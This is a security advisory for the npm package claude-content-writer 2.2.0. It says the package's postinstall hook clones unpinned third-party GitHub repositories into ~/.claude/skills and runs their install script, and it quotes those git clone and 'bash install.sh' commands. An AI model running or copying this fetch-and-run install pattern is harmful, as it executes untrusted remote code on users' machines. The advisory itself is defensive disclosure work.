npm · Malicious package advisory
Malwareclaude-content-writer
MAL-2026-4524
Malicious code in claude-content-writer (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (b38e69b148dc7998c9ab02fb5b6c2a90413a88129cf7db96b1c900e9c830f719) On `npm install`, the package's postinstall hook runs scripts/install-dependencies.sh, which performs `git clone --depth 1 https://github.com/AgriciDaniel/claude-seo.git` and `git clone` of github.com/blader/humanizer into ~/.claude/skills with no commit pinning, then `cd claude-seo && bash install.sh`. The cloned repositories are personal GitHub accounts unrelated to the package publisher; whatever code their maintainers (or an attacker who takes over either account) push to HEAD will execute on every installer's machine at install time. There is no integrity verification, version pinning, or publisher-matching for the fetched code. Additionally, package.json declares the package itself as a dependency (`claude-content-writer: ^2.0.1`), which expands the install-time trust surface unpredictably by pulling another published version of the same package during resolution.
Compromised versions (1)
- 2.2.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.